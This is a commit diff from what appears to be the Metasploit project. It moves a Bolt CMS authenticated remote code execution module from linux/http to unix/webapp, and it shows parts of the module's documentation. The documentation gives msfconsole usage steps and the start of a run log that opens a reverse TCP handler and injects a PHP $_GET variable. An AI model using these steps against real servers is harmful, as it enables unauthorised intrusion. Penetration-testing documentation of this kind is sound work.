Move module to unix/webapp

This commit is contained in:
William Vu 2020-06-25 12:42:45 -05:00
parent c03c580d12
commit 7273ac1a92
2 changed files with 4 additions and 4 deletions

View File

@ -26,7 +26,7 @@ The module requires valid credentials for a Bolt CMS user. This module has been
## Verification Steps
1. Install the module as usual
2. Start msfconsole
3. Do: `use exploit/linux/http/bolt_authenticated_rce`
3. Do: `use exploit/unix/webapp/bolt_authenticated_rce`
4. Do: `set RHOSTS [IP]`
5. Do: `set USERNAME [username for the Bolt CMS account]`
6. Do: `set PASSWORD [password for the Bolt CMS account]`
@ -52,9 +52,9 @@ The username for the Bolt CMS account to authenticate with. This option is requi
## Scenarios
### Bolt CMS 3.7.0 running on CentOS 7
```
msf5 exploit(linux/http/bolt_authenticated_rce) > show options
msf5 exploit(unix/webapp/bolt_authenticated_rce) > show options
Module options (exploit/linux/http/bolt_authenticated_rce):
Module options (exploit/unix/webapp/bolt_authenticated_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
@ -88,7 +88,7 @@ Exploit target:
2 Linux (cmd)
msf5 exploit(linux/http/bolt_authenticated_rce) > run
msf5 exploit(unix/webapp/bolt_authenticated_rce) > run
[*] Started reverse TCP handler on 192.168.1.10:4444
[+] Successfully changed the /bolt/profile username to PHP $_GET variable "nbxnh".